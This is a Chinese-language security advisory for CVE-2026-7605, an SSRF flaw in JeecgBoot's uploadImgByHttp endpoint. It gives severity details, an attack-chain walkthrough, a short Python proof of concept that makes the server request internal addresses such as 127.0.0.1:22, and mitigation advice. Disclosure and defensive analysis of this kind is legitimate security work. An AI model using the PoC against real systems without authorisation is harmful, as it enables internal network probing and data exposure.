IPBUF安全漏洞报告
English
CVE-2026-7605 CVSS 6.3 中危

CVE-2026-7605 JeecgBoot SSRF漏洞

披露日期: 2026-05-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7605
漏洞类型
服务端请求伪造
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
JeecgBoot

相关标签

SSRFJeecgBoot服务端请求伪造中危

漏洞概述

JeecgBoot 3.9.1及以下版本存在安全漏洞,涉及CommonController组件中的uploadImgByHttp接口。该漏洞允许攻击者通过构造恶意请求发起服务器端请求伪造(SSRF)攻击,可能造成敏感信息泄露。目前利用代码已公开,建议受影响用户尽快升级。

技术细节

该漏洞位于JeecgBoot的CommonController.java文件中,具体影响uploadImgByHttp端点。该接口调用了HttpFileToMultipartFileUtil工具类中的httpFileToMultipartFile和downloadImageData方法。当用户传入一个URL参数时,系统会尝试从该URL下载图片数据。由于缺乏对目标URL的有效性验证和内网IP限制,攻击者可以传入内网地址(如http://127.0.0.1)或云元数据地址。服务器端会代为请求这些地址,从而导致SSRF漏洞。攻击者可利用此特性探测内网端口、读取本地敏感文件或对内部服务发起攻击。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标系统使用的是JeecgBoot框架,且版本在3.9.1及以下。
STEP 2
2. 构造恶意请求
攻击者向CommonController.uploadImgByHttp接口发送POST请求,参数中包含指向内网敏感资源的URL(如http://localhost/admin)。
STEP 3
3. 服务器端请求
服务器端接收到请求后,调用HttpFileToMultipartFileUtil工具类,解析URL并代为请求攻击者指定的内网地址。
STEP 4
4. 信息泄露或内网渗透
攻击者根据服务器的响应时间或返回的内容,判断内网端口状态或获取敏感数据,实现对内网的进一步渗透。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (adjust host and port) target = "http://127.0.0.1:8080" endpoint = "/jeecg-boot/sys/common/uploadImgByHttp" url = target + endpoint # SSRF Payload (trying to access internal localhost) payload = { "url": "http://127.0.0.1:22", # Example: Scanning internal SSH port "fileName": "test.jpg" } try: response = requests.post(url, data=payload) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") except Exception as e: print(f"Error: {e}")

影响范围

JeecgBoot <= 3.9.1

防御指南

临时缓解措施
如果无法立即升级,建议临时禁用uploadImgByHttp接口或通过安全组件(如Nginx反向代理)拦截对该接口的访问请求,并严格校验传入URL的格式,禁止访问内网IP段。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表